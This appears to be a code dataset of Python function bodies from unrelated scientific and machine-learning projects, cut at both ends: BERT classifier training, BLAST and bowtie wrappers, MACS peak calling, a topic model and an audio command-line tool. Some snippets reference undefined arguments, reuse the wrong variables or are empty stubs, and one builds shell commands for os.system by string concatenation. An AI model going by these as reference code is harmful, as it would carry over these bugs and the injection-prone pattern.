max_length=args.max_len)\n \n if args.lang_model[:10] == \"distilbert\":\n model_class = \"DistilBERT\"\n tokenizer = DistilBertTokenizer.from_pretrained(args.lang_model, do_lower_case=lower_case, max_length=args.max_len)\n \n\n # get training features\n cats = train_df.columns[5:]\n end = \"full\"\n # exclude categories if required\n if (args.exclude_general):\n cats = [i for i in list(cats) if \"Allgemein\" not in i]\n end = \"excl_gen\"\n if (args.exclude_neutral):\n cats = [i for i in list(cats) if \"neutral\" not in i]\n end = \"excl_neu\"\n if (args.exclude_general_neutral):\n cats = [i for i in list(cats) if \"Allgemein:neutral\" not in i]\n end = \"excl_genneu\"\n \n num_labels = len(list(cats))\n\n # create one hot labels\n train_df['one_hot_labels'] = list(train_df[list(cats)].values)\n dev_df['one_hot_labels'] = list(dev_df[list(cats)].values)\n test_syn_df['one_hot_labels'] = list(test_syn_df[list(cats)].values)\n test_dia_df['one_hot_labels'] = list(test_dia_df[list(cats)].values)\n\n # retrieve sentences and labels\n df = pd.concat([train_df, dev_df])\n sentences = df.text.values\n labels = list(df.one_hot_labels.values) \n\n sentences_syn = test_syn_df.text.values\n labels_syn = list(test_syn_df.one_hot_labels.values)\n\n sentences_dia = test_dia_df.text.values\n labels_dia = list(test_dia_df.one_hot_labels.values)\n \n print(\"number of categories:\", len(list(cats)))\n\n # Tokenize all of the sentences and map the tokens to their word IDs. \n input_ids = [tokenizer.encode(sent, add_special_tokens=True, truncation=True, \n max_length=args.max_len) for sent in sentences]\n input_ids = pad_sequences(input_ids, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n # Create attention masks\n attention_masks = [[int(token_id > 0) for token_id in sent] for sent in input_ids]\n \n # synchronic test data\n input_ids_syn = [tokenizer.encode(sent, add_special_tokens=True, truncation=True) for sent in sentences_syn]\n input_ids_syn = pad_sequences(input_ids_syn, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n attention_masks_syn = [[int(token_id > 0) for token_id in sent] for sent in input_ids_syn]\n \n # diachronic test data\n input_ids_dia = [tokenizer.encode(sent, add_special_tokens=True, truncation=True) for sent in sentences_dia]\n input_ids_dia = pad_sequences(input_ids_dia, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n attention_masks_dia = [[int(token_id > 0) for token_id in sent] for sent in input_ids_dia]\n\n # split train, dev\n train_inputs, train_labels, dev_inputs, dev_labels, train_masks, dev_masks = split_train_dev(\n train_df, dev_df, attention_masks, input_ids, labels)\n \n # transform to torch tensor\n train_inputs = torch.tensor(train_inputs)\n dev_inputs = torch.tensor(dev_inputs)\n\n train_labels = torch.tensor(train_labels)\n dev_labels = torch.tensor(dev_labels)\n\n train_masks = torch.tensor(train_masks)\n dev_masks = torch.tensor(dev_masks)\n\n test_syn_inputs = torch.tensor(input_ids_syn)\n test_syn_masks = torch.tensor(attention_masks_syn)\n test_syn_labels = torch.tensor(labels_syn)\n\n test_dia_inputs = torch.tensor(input_ids_dia)\n test_dia_masks = torch.tensor(attention_masks_dia)\n test_dia_labels = torch.tensor(labels_dia)\n\n # Create the DataLoader\n train_dataloader = create_dataloader(train_inputs, train_masks, \n train_labels, args.batch_size, train = True)\n\n dev_dataloader = create_dataloader(dev_inputs, dev_masks, \n dev_labels, args.batch_size, train = False)\n\n test_syn_dataloader = create_dataloader(test_syn_inputs, test_syn_masks, \n test_syn_labels, args.batch_size, \n train = False)\n\n test_dia_dataloader = create_dataloader(test_dia_inputs, test_dia_masks, \n test_dia_labels, args.batch_size, \n train = False)\n\n # Create model\n if args.train:\n if model_class == \"BERT\":\n config = BertConfig.from_pretrained(args.lang_model, num_labels=num_labels) \n config.hidden_dropout_prob = 0.1 \n model = BertForSequenceClassification.from_pretrained(\n args.lang_model,\n num_labels = num_labels,\n output_attentions = False,\n output_hidden_states = False\n )\n\n if model_class == \"DistilBERT\":\n config = DistilBertConfig.from_pretrained(args.lang_model, num_labels=num_labels) \n config.hidden_dropout_prob = 0.1 \n model = DistilBertForSequenceClassification.from_pretrained(\n args.lang_model,\n num_labels = num_labels,\n output_attentions = False,\n output_hidden_states = False\n )\n model.cuda()\n\n\n # Create an optimizer\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.0}\n ]\n optimizer = AdamW(\n optimizer_grouped_parameters,\n lr=args.lr,\n eps = 1e-8\n )\n # Total number of training steps = number of batches * number of epochs\n total_steps = len(train_dataloader) * args.epochs\n # Create the learning rate scheduler\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=total_steps\n )\n \n # train model\n # Main Loop\n print(\"=================== Train ================\")\n print(\"##### Language Model:\", args.lang_model, \",\", \"learning rate:\", args.lr)\n print()\n\n track_time = time.time()\n # trange is a tqdm wrapper around the normal python range\n for epoch in trange(args.epochs, desc=\"Epoch\"):\n print(\"Epoch: %4i\"%epoch, dt.datetime.now())\n\n model, optimizer, scheduler, tr_loss = train_multilabel(\n train_dataloader=train_dataloader, \n model=model, \n device=device, \n optimizer=optimizer, \n scheduler=scheduler, \n num_labels=num_labels\n )\n # EVALUATION: TRAIN SET\n pred_bools_train, true_bools_train, f1_train = eval_multilabel(\n train_dataloader, model=model, device=device)\n print(\"TRAIN: micro F1 %.3f\"%(f1_train))\n \n # EVALUATION: DEV SET\n pred_bools_dev, true_bools_dev, f1_dev = eval_multilabel(\n dev_dataloader, model=model, device=device)\n print(\"EVAL: micro F1 %.3f\"%(f1_dev))\n \n\n print(\" Training and validation took in total: {:}\".format(format_time(time.time()-track_time)))\n\n # EVALUATION: TEST SYN SET\n pred_bools_syn, true_bools_syn, f1_test_syn = eval_multilabel(\n test_syn_dataloader, model=model, device=device)\n print(\"TEST SYN: micro F1 %.4f\"%(f1_test_syn))\n\n # classification report\n clf_report_syn = classification_report(true_bools_syn, pred_bools_syn, target_names=cats, digits=3)\n print(clf_report_syn)\n\n\n # EVALUATION: TEST DIA SET\n pred_bools_dia, true_bools_dia, f1_test_dia = eval_multilabel(\n test_dia_dataloader, model=model, device=device\n )\n print(\"TEST DIA: micro F1 %.4f\"%(f1_test_dia))\n\n # classification report\n clf_report_dia = classification_report(true_bools_dia, pred_bools_dia, target_names=cats, digits=3)\n print(clf_report_dia)\n \n if args.save_cr:\n pickle.dump(clf_report_syn, open(args.output_path+'clf_report_'+args.lang_model+'_test_syn_'+str(num_labels)+end+'.txt','wb'))\n pickle.dump(clf_report_dia, open(args.output_path+'clf_report_'+args.lang_model+'_test_dia_'+str(num_labels)+end+'.txt','wb'))\n\n\n if args.save_prediction:\n test_syn_df[\"category_pred\"] = pred_bools_syn\n test_dia_df[\"category_pred\"] = pred_bools_dia\n test_syn_df.category_pred.to_csv(args.output_path+args.lang_model+'_test_syn_'+str(num_labels)+end+\".tsv\", \n sep=\"\\t\", index = False, header = True, encoding = \"utf-8-sig\")\n test_dia_df.category_pred.to_csv(args.output_path+args.lang_model+'_test_dia_'+str(num_labels)+end+\".tsv\", \n sep=\"\\t\", index = False, header = True, encoding = \"utf-8-sig\")", "def analyse(self):\n pass", "def main():\n count = 0\n\n # Read in the required files and filenames.\n predicted_proteins, protein_db, output_file_aug_to_fasta, \\\n output_file_proteins_to_db, blastp_output, output_to_file, \\\n overwrite = call_files()\n\n # Write all entries in the AUGUSTUS output to a FASTA file\n for record in split_records_aug(predicted_proteins):\n if count == 0:\n mode = 'w'\n else:\n mode = 'a'\n write_fasta(record, output_file_aug_to_fasta, mode)\n count += 1\n\n # Create a blast database and carry out a blastp search\n blast_db = blast_database(protein_db, 'prot', True,\n output_file_proteins_to_db, overwrite)\n\n blastp_file = blastp(output_file_proteins_to_db, output_file_aug_to_fasta,\n True, blastp_output, overwrite, 7)\n\n # Parse the blastp results for the desired information\n blast_results = parse_blastp_output(blastp_output)\n\n # Print the results\n print_output(blast_results)", "def run_annotation(args):\n #print(\"running chronqc_annotation\")\n chronqc_annotation.main(args)", "def main():\n\n # add basic arguments\n parser = argparse.ArgumentParser()\n # path to executable\n parser.add_argument(\"bowtie_path\", type=str, help=\"path/to/bowtie_executable/\")\n # select path to output directory, otherwise default location is input dir\n parser.add_argument(\"index_output_fq\", type=str, help=\"/path/to/output_index_directory/\" )\n parser.add_argument(\"output_sam\", type=str, help=\"path/to/output/sam_file\")\n\n # select either paired end or single end\n parser.add_argument(\"-1\", \"--pe1\", nargs='*', help=\"comma seperated list of forward pair fastq files\")\n parser.add_argument(\"-2\", \"--pe2\", nargs='*', help=\"comma seperated list of reverse pair fastq files\")\n parser.add_argument(\"-u\", \"--unpaired\", nargs='*', help=\"comma sperated list of unpaired fastq files\")\n\n parser.add_argument(\"-c\", \"--contigs\", nargs='+', required=True, help=\"comma seperated list of contig fasta files\")\n\n # option to have log files\n parser.add_argument(\"-l\", \"--log\", type=str, help=\"/path/to/log_file\")\n\n args = parser.parse_args()\n\n # if a log file is specified, use it\n if args.log is not None:\n print(\"there exists an output log\")\n log_file = args.log\n # begin program, set up logger\n logging.basicConfig(filename=log_file, level=logging.INFO)\n logging.debug('begin main')\n\n # sanity check\n logging.info('The bowtie executable file path is: {0}'.format(args.bowtie_path))\n\n if args.pe1:\n logging.info('The pe1 fastq files processed by bowtie are: {0}'.format(args.pe1))\n if args.pe2:\n logging.info('The pe2 fastq files processed by bowtie are: {0}'.format(args.pe2))\n if args.pe12:\n logging.info('The unpaired fastq files processed by bowtie are: {0}'.format(args.unpaired))\n if args.se:\n logging.info('The fasta files processed by bowtie-build are: {0}'.format(args.contigs))\n\n logging.info('The bowtie index directory is: {0}'.format(args.index_output_fq))\n logging.info('The bowtie output SAM file is: {0}'.format(args.output_sam))\n\n # call the megahit subprocess\n print(build_run_bowtie(args.bowtie_path, args.contigs, args.index_output_fq, args.pe1, args.pe2, args.unpaired,\n args.output_sam))", "def run_analysis(self):\n\n self._apply_loads_to_framat_model()\n\n # ----- Run the FramAT analysis -----\n results = standard_run(args=StdRunArgs(filename=self.own_files['model_file'], verbose=True))\n self.last_solution = results\n\n # ----- Share loads -----\n logger.info(\"Sharing loads...\")\n frame = results['frame']\n self.shared.structure.def_fields = frame.deformation.get_displacement_fields(frame, n_sup=1000)", "def run_blast(inputfile, input_type, outputfile, database, args=None, verbose=True):\n\n assert (input_type in ['protein', 'dna']), \"Input type must be either 'protein' or 'dna'\"\n\n cmd = ['diamond']\n\n if input_type == 'protein':\n cmd += ['blastp']\n elif input_type == 'dna':\n cmd += ['blastx']\n\n cmd += ['-d', database]\n cmd += ['-q', inputfile]\n cmd += ['-o', outputfile]\n\n if not args:\n args = \"--more-sensitive --top 10 --quiet\"\n\n cmd += args.split()\n\n if verbose:\n print(' '.join(cmd))\n\n with open(os.devnull, 'w') as devnull:\n try:\n exit_code = call(cmd, stdout=devnull)\n except OSError:\n exit_code = None\n\n return exit_code", "def call_binana(self, autodock_path, autodock_path_2):\n import process_binana\n autodock_chain_A = \"$MGL/pythonsh $ADT/prepare_receptor4.py -r \" + self.complex_name_A \\\n + \" -A hydrogens -o output/\" + self.complex_name + \"_\" + self.chains[0] + \".pdbqt\\n\"\n autodock_chain_B = \"$MGL/pythonsh $ADT/prepare_receptor4.py -r \" + self.complex_name_B \\\n + \" -A hydrogens -o output/\" + self.complex_name + \"_\" + self.chains[1] + \".pdbqt\\n\"\n self.write_binana_sh(autodock_path, autodock_path_2, autodock_chain_A, autodock_chain_B)\n os.system(\"sh pdbqt_generator.sh\")\n binana_output = \"binana_\" + self.pdb_path\n binana_command = \"python services/binana_1_2_0.py -receptor output/\" + self.pdb_name \\\n + \"_complex_\" + self.chains[0] + \".pdbqt -ligand output/\" \\\n + self.pdb_name + \"_complex_\" + self.chains[1] + \".pdbqt -output_file \" + binana_output\n os.system(binana_command)\n binana_output = process_binana.retrieve_features(binana_output)\n return binana_output", "def main(argv: Sequence[Text]) -> None:\n\n\n print(\"TODO\")", "def _send_analysis(self, analysis_name):", "def main():\n boba_blast_game.main()", "def run( args ):\n # Parse options...\n options = opt_validate_callpeak( args )\n # end of parsing commandline options\n info = options.info\n warn = options.warn\n debug = options.debug\n error = options.error\n \n #0 output arguments\n info(\"\\n\"+options.argtxt)\n options.PE_MODE = options.format in ('BAMPE','BEDPE')\n if options.PE_MODE:\n tag = 'fragment' # call things fragments not tags\n else:\n tag = 'tag'\n\n tempfile.tempdir = options.tempdir\n\n #1 Read tag files\n info(\"#1 read %s files...\", tag)\n if options.PE_MODE:\n (treat, control) = load_frag_files_options (options)\n else:\n (treat, control) = load_tag_files_options (options)\n if control is not None:\n # check if chromosome names are consistent. quit if not.\n check_names(treat, control, error)\n\n info(\"#1 %s size = %.1f\", tag, options.tsize)\n tagsinfo = \"# %s size is determined as %d bps\\n\" % (tag, options.tsize)\n\n t0 = treat.total\n tagsinfo += \"# total %ss in treatment: %d\\n\" % (tag, t0)\n info(\"#1 total %ss in treatment: %d\", tag, t0)\n\n # handle duplicates\n if options.keepduplicates != \"all\":\n if options.keepduplicates == \"auto\":\n info(\"#1 calculate max duplicate %ss in single position based on binomial distribution...\", tag)\n treatment_max_dup_tags = cal_max_dup_tags(options.gsize,t0)\n info(\"#1 max_dup_tags based on binomial = %d\" % (treatment_max_dup_tags))\n else:\n info(\"#1 user defined the maximum %ss...\", tag)\n treatment_max_dup_tags = int(options.keepduplicates)\n if options.PE_MODE:\n info(\"#1 filter out redundant fragments by allowing at most %d identical fragment(s)\", treatment_max_dup_tags)\n else:\n info(\"#1 filter out redundant tags at the same location and the same strand by allowing at most %d tag(s)\", treatment_max_dup_tags)\n\n treat.filter_dup(treatment_max_dup_tags)\n t1 = treat.total\n info(\"#1 %ss after filtering in treatment: %d\", tag, t1)\n tagsinfo += \"# %ss after filtering in treatment: %d\\n\" % (tag, t1)\n if options.PE_MODE:\n tagsinfo += \"# maximum duplicate fragments in treatment = %d\\n\" % (treatment_max_dup_tags)\n else:\n tagsinfo += \"# maximum duplicate tags at the same position in treatment = %d\\n\" % (treatment_max_dup_tags)\n info(\"#1 Redundant rate of treatment: %.2f\", float(t0 - t1) / t0)\n tagsinfo += \"# Redundant rate in treatment: %.2f\\n\" % (float(t0-t1)/t0)\n else:\n t1 = t0\n\n if control is not None:\n c0 = control.total\n tagsinfo += \"# total %ss in control: %d\\n\" % (tag, c0)\n info(\"#1 total %ss in control: %d\", tag, c0)\n\n if options.keepduplicates != \"all\":\n if options.keepduplicates == \"auto\":\n info(\"#1 for control, calculate max duplicate %ss in single position based on binomial distribution...\", tag)\n control_max_dup_tags = cal_max_dup_tags(options.gsize,c0)\n info(\"#1 max_dup_tags based on binomial = %d\" % (control_max_dup_tags))\n else:\n info(\"#1 user defined the maximum %ss...\", tag)\n control_max_dup_tags = int(options.keepduplicates)\n if options.PE_MODE:\n info(\"#1 filter out redundant fragments by allowing at most %d identical fragment(s)\", treatment_max_dup_tags)\n else:\n info(\"#1 filter out redundant tags at the same location and the same strand by allowing at most %d tag(s)\", treatment_max_dup_tags)\n control.filter_dup(treatment_max_dup_tags)\n #control.separate_dups(treatment_max_dup_tags) # changed 5-29; changed back since we don't need to call addbackdup+refinepeak anymore\n c1 = control.total\n\n info(\"#1 %ss after filtering in control: %d\", tag, c1)\n tagsinfo += \"# %ss after filtering in control: %d\\n\" % (tag, c1)\n if options.PE_MODE:\n tagsinfo += \"# maximum duplicate fragments in control = %d\\n\" % (treatment_max_dup_tags)\n else:\n tagsinfo += \"# maximum duplicate tags at the same position in control = %d\\n\" % (treatment_max_dup_tags)\n\n info(\"#1 Redundant rate of control: %.2f\" % (float(c0-c1)/c0))\n tagsinfo += \"# Redundant rate in control: %.2f\\n\" % (float(c0-c1)/c0)\n else:\n c1 = c0\n info(\"#1 finished!\")\n\n #2 Build Model\n info(\"#2 Build Peak Model...\")\n\n if options.nomodel:\n info(\"#2 Skipped...\")\n if options.PE_MODE:\n options.d = options.tsize\n else:\n options.d=options.extsize\n info(\"#2 Use %d as fragment length\" % (options.d))\n if options.shift > 0:\n info(\"#2 Sequencing ends will be shifted towards 3' by %d bp(s)\" % (options.shift))\n elif options.shift < 0:\n info(\"#2 Sequencing ends will be shifted towards 5' by %d bp(s)\" % (options.shift * -1))\n options.scanwindow=2*options.d # remove the effect of --bw\n else:\n peakmodel = PeakModel(treatment = treat,\n max_pairnum = MAX_PAIRNUM,\n opt = options\n )\n try:\n peakmodel.build()\n info(\"#2 finished!\")\n debug(\"#2 Summary Model:\")\n debug(\"#2 min_tags: %d\" % (peakmodel.min_tags))\n debug(\"#2 d: %d\" % (peakmodel.d))\n debug(\"#2 scan_window: %d\" % (peakmodel.scan_window))\n info(\"#2 predicted fragment length is %d bps\" % peakmodel.d)\n info(\"#2 alternative fragment length(s) may be %s bps\" % ','.join(map(str,peakmodel.alternative_d)))\n info(\"#2.2 Generate R script for model : %s\" % (options.modelR))\n model2r_script(peakmodel,options.modelR,options.name)\n options.d = peakmodel.d\n options.scanwindow= 2*options.d\n if options.d <= 2*options.tsize:\n warn(\"#2 Since the d (%.0f) calculated from paired-peaks are smaller than 2*tag length, it may be influenced by unknown sequencing problem!\" % (options.d))\n if options.onauto:\n options.d=options.extsize\n options.scanwindow=2*options.d\n warn(\"#2 MACS will use %d as EXTSIZE/fragment length d. NOTE: if the d calculated is still acceptable, please do not use --fix-bimodal option!\" % (options.d))\n else:\n warn(\"#2 You may need to consider one of the other alternative d(s): %s\" % ','.join(map(str,peakmodel.alternative_d)))\n warn(\"#2 You can restart the process with --nomodel --extsize XXX with your choice or an arbitrary number. Nontheless, MACS will continute computing.\")\n\n except NotEnoughPairsException:\n if not options.onauto:\n sys.exit(1)\n warn(\"#2 Skipped...\")\n options.d=options.extsize\n options.scanwindow=2*options.d\n warn(\"#2 Since --fix-bimodal is set, MACS will use %d as fragment length\" % (options.d))\n\n #3 Call Peaks\n info(\"#3 Call peaks...\")\n if options.nolambda:\n info(\"# local lambda is disabled!\")\n\n if control and options.PE_MODE:\n c1 = c1 * 2 # in PE_MODE, PE data has to be doubled since both ends will be counted for calculating background noise.\n\n # decide the scaling to balance the depth between treatment and control\n if control:\n if options.downsample:\n # use random sampling to balance treatment and control\n info(\"#3 User prefers to use random sampling instead of linear scaling.\")\n if t1 > c1:\n info(\"#3 MACS is random sampling treatment %ss...\", tag)\n if options.seed < 0:\n warn(\"#3 Your results may not be reproducible due to the random sampling!\")\n else:\n info(\"#3 Random seed (%d) is used.\" % options.seed)\n treat.sample_num(c1, options.seed)\n info(\"#3 %d Tags from treatment are kept\", treat.total)\n elif c1 > t1:\n info(\"#3 MACS is random sampling control %ss...\", tag)\n if options.seed < 0:\n warn(\"#3 Your results may not be reproducible due to the random sampling!\")\n else:\n info(\"#3 Random seed (%d) is used.\" % options.seed)\n control.sample_num(t1, options.seed)\n info(\"#3 %d %ss from control are kept\", control.total, tag)\n # set options.tocontrol although it would;t matter now\n options.tocontrol = False\n else:\n if options.scaleto == \"large\":\n if t1 > c1:\n # treatment has more tags than control, since tolarge is\n # true, we will scale control to treatment.\n options.tocontrol = False\n else:\n # treatment has less tags than control, since tolarge is\n # true, we will scale treatment to control.\n options.tocontrol = True\n else:\n if t1 > c1:\n # treatment has more tags than control, since tolarge is\n # false, we will scale treatment to control.\n options.tocontrol = True\n else:\n # treatment has less tags than control, since tolarge is\n # false, we will scale control to treatment.\n options.tocontrol = False\n\n peakdetect = PeakDetect(treat = treat,\n control = control,\n opt = options\n )\n peakdetect.call_peaks()\n\n # filter out low FE peaks\n peakdetect.peaks.filter_fc( fc_low = options.fecutoff )\n\n #4 output\n #4.1 peaks in XLS\n info(\"#4 Write output xls file... %s\" % (options.peakxls))\n ofhd_xls = open( options.peakxls, \"w\" )\n ofhd_xls.write(\"# This file is generated by MACS version %s\\n\" % (MACS_VERSION))\n ofhd_xls.write(options.argtxt+\"\\n\")\n ofhd_xls.write(tagsinfo)\n if options.shift > 0:\n ofhd_xls.write(\"# Sequencing ends will be shifted towards 3' by %d bp(s)\\n\" % (options.shift))\n elif options.shift < 0:\n ofhd_xls.write(\"# Sequencing ends will be shifted towards 5' by %d bp(s)\\n\" % (options.shift * -1))\n\n ofhd_xls.write(\"# d = %d\\n\" % (options.d))\n try:\n ofhd_xls.write(\"# alternative fragment length(s) may be %s bps\\n\" % ','.join(map(str,peakmodel.alternative_d)))\n except:\n # when --nomodel is used, there is no peakmodel object. Simply skip this line.\n pass\n if options.nolambda:\n ofhd_xls.write(\"# local lambda is disabled!\\n\")\n # pass write method so we can print too, and include name\n peakdetect.peaks.write_to_xls(ofhd_xls, name = options.name.encode())\n ofhd_xls.close()\n\n #4.2 peaks in BED\n if options.log_pvalue != None:\n score_column = \"pscore\"\n elif options.log_qvalue != None:\n score_column = \"qscore\"\n #4.2 peaks in narrowPeak\n if not options.broad:\n info(\"#4 Write peak in narrowPeak format file... %s\" % (options.peakNarrowPeak))\n ofhd_bed = open( options.peakNarrowPeak, \"w\" )\n peakdetect.peaks.write_to_narrowPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), score_column=score_column, trackline=options.trackline )\n ofhd_bed.close()\n #4.2-2 summits in BED\n info(\"#4 Write summits bed file... %s\" % (options.summitbed))\n ofhd_summits = open( options.summitbed, \"w\" )\n peakdetect.peaks.write_to_summit_bed (ofhd_summits, name_prefix=\"%s_peak_\".encode(), name=options.name.encode(),\n description=(\"Summits for %s (Made with MACS v2, \" + strftime(\"%x\") + \")\").encode(),\n score_column=score_column, trackline=options.trackline )\n ofhd_summits.close()\n #4.2 broad peaks in bed12 or gappedPeak\n else:\n info(\"#4 Write broad peak in broadPeak format file... %s\" % (options.peakBroadPeak))\n ofhd_bed = open( options.peakBroadPeak, \"w\" )\n peakdetect.peaks.write_to_broadPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), description=options.name.encode(), score_column=score_column, trackline=options.trackline)\n ofhd_bed.close()\n info(\"#4 Write broad peak in bed12/gappedPeak format file... %s\" % (options.peakGappedPeak))\n ofhd_bed = open( options.peakGappedPeak, \"w\" )\n peakdetect.peaks.write_to_gappedPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), description=options.name.encode(), score_column=score_column, trackline=options.trackline)\n ofhd_bed.close()\n\n info(\"Done!\")", "def main():\n parser = argparse.ArgumentParser(description='Run dap model on signalmedia data.')\n parser.add_argument('--train_file', type=str, help='Path to training data file.',\n default=\"train_signalmedia.dap\")\n parser.add_argument('--test_file', type=str, help='Path to testing data file. If None, no prediction is run',\n default=\"test_signalmedia.dap\")\n parser.add_argument('--vocab_file', type=str, help='Path to vocabulary file.',\n default=\"signalmedia.bow.vocab\")\n parser.add_argument('--data_dir', type=str, help='directory where all data files reside.')\n parser.add_argument('--evaluate_every', type=int,\n help=\"If given a test file, number of EM iterations between evaluations of test set. Default of 0 = evaluate after each epoch.\")\n parser.add_argument('--max_training_minutes', type=float,\n help=\"If given this will stop training once the specified number of minutes have elapsed.\")\n parser.add_argument('--max_epochs', type=int)\n parser.add_argument('--process_noise', type=float, default=0.2)\n parser.add_argument('--measurement_noise', type=float, default=0.8)\n parser.add_argument('--num_topics', type=int, default=75)\n parser.add_argument('--num_personas', type=int, default=25)\n parser.add_argument('--regularization', type=float, default=0.2,\n help=\"How much to penalize similar personas. Recommend [0, 0.5].\")\n parser.add_argument('--batch_size', type=int, default=512,\n help=\"Batch size. Set to -1 for full gradient updates, else stochastic mini-batches used.\")\n parser.add_argument('--num_workers', type=int, default=1)\n args = parser.parse_args()\n\n path_to_current_file = os.path.abspath(os.path.dirname(__file__))\n if args.data_dir is None:\n data_dir = os.path.join(path_to_current_file, \"../../data/signalmedia/blogs_aligned_3_30/\")\n else:\n data_dir = args.data_dir\n\n np.random.seed(2018)\n\n disable_log = False\n if disable_log:\n logging.disable(logging.INFO)\n else:\n log_format = '%(asctime)s : %(levelname)s : %(message)s'\n logging.basicConfig(format=log_format, level=logging.INFO)\n\n # initialize model\n dap = DAPPER(num_topics=args.num_topics, num_personas=args.num_personas,\n process_noise=args.process_noise, measurement_noise=args.measurement_noise,\n regularization=args.regularization,\n max_epochs=args.max_epochs, max_training_minutes=args.max_training_minutes,\n batch_size=args.batch_size,\n step_size=0.7, learning_offset=10, learning_decay=0.7,\n num_workers=args.num_workers)\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n train = Corpus(input_file=data_dir + args.train_file, vocab_file=data_dir + args.vocab_file)\n test = Corpus(input_file=data_dir + args.test_file,\n vocab_file=data_dir + args.vocab_file,\n author2id=train.author2id)\n\n train_results, test_results = dap.fit_predict(train_corpus=train, test_corpus=test,\n evaluate_every=args.evaluate_every,\n random_beta=False,\n check_model_lhood=True)\n # train_results = dap.fit(corpus=train, random_beta=False, check_model_lhood=False)\n print(dap)\n\n # save model output\n results_dir = data_dir.replace(\"/data/\", \"/results/\")\n if not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\n model_sig = \"K{}_P{}_bs{}_pn{}_mn{}_reg{}_epochs{}_cpu{}_{}.txt\".format(\n args.num_topics, args.num_personas,\n args.batch_size,\n int(100 * args.process_noise), int(100 * args.measurement_noise),\n int(100 * args.regularization), dap.total_epochs,\n args.num_workers, time.strftime('%m_%d_%Y_%H%M'))\n dap.save_topics(filename=results_dir + \"topics_\" + model_sig, topn=10)\n dap.save_author_personas(filename=results_dir + \"personas_\" + model_sig)\n dap.save_persona_topics(filename=results_dir + \"alpha_\" + model_sig)\n dap.save_convergences(filename=results_dir + \"train_convergence_\" + model_sig, results=train_results)\n dap.save_convergences(filename=results_dir + \"test_convergence_\" + model_sig, results=test_results)", "def run_experiment():\n pass", "def run(args):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n # create a plot subcommand\n parser_plot = subparsers.add_parser('plot', aliases=[\"plt\", \"p\"],\n help='plot a set of discrete signals')\n parser_plot.add_argument(\n 'files', nargs='+', help='audio files to be plotted requiers >=1')\n parser_plot.set_defaults(func=plot)\n\n # create a interpolation subcommand\n parser_interpolation = subparsers.add_parser('interpolate', aliases=[\"inp\", \"interp\"],\n help='interpolate a signal by a factor a')\n parser_interpolation.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_interpolation.add_argument('factor', help='factor of interpolation')\n parser_interpolation.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_interpolation.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_interpolation.set_defaults(func=interpolate)\n\n # create a decimation subcommand\n parser_decimation = subparsers.add_parser('decimate', aliases=[\"dec\", \"d\"],\n help='downsample a signal by a factor a')\n parser_decimation.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_decimation.add_argument('factor', help='factor of downsampling')\n parser_decimation.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_decimation.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_decimation.set_defaults(func=decimate)\n\n # create a shift subcommand\n parser_shift = subparsers.add_parser('shift', aliases=[\"s\", \"sh\"],\n help='shifts a signal n times in time')\n parser_shift.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_shift.add_argument('factor', help='shift amount')\n parser_shift.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_shift.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_shift.set_defaults(func=shift)\n\n # create a reflect subcommand\n parser_reflect = subparsers.add_parser('reflect', aliases=[\"r\", \"rf\"],\n help='reflecrts a signal in time')\n parser_reflect.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_reflect.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_reflect.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_reflect.set_defaults(func=reflect)\n\n # create a mamplitude subcommand\n parser_mamplitude = subparsers.add_parser('mamplitude', aliases=[\"ma\", \"mamp\"],\n help='modifies the amplitude of a signal')\n parser_mamplitude.add_argument(\n 'ipath', help='path of the file which contains the signal')\n parser_mamplitude.add_argument('factor', help='amplitude amount')\n parser_mamplitude.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='output.wav')\n parser_mamplitude.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_mamplitude.set_defaults(func=mamplitude)\n\n # create a record subcommand\n parser_record = subparsers.add_parser('record', aliases=[\"rec\", \"r\"],\n help='records audio from computer\\'s built in mic')\n parser_record.add_argument(\n '-opath', '-o', help=\"Path to store the resulted signal\", default='record.wav')\n parser_record.add_argument(\n '-secs', '-s', help=\"seconds of audio to be recorded\", default=4)\n parser_record.add_argument(\n '-plot', '-p', help=\"plot the resulting signal\", default=False)\n parser_record.set_defaults(func=record)\n\n # create a play subcommand\n parser_play = subparsers.add_parser('play', aliases=[\"pl\", \"reproduce\"],\n help='reproduces audio from file')\n parser_play.add_argument(\n 'ipath', help=\"Path of the audio file\")\n parser_play.add_argument(\n '-plot', '-p', help=\"plot the audio signal\", default=False)\n parser_play.set_defaults(func=play)\n\n # create a gui subcommand\n parser_gui = subparsers.add_parser('gui', aliases=[\"g\", \"interface\"],\n help='launches the program in gui mode')\n parser_gui.set_defaults(func=guiMode)\n\n # parse arguments from shell\n if len(sys.argv) <= 1:\n sys.argv.append('--help')\n options = parser.parse_args()\n options.func(options)", "def run_everything(self):\n try:\n if self.database == \"genome\":\n self.genome_deprecation()\n return\n\n record 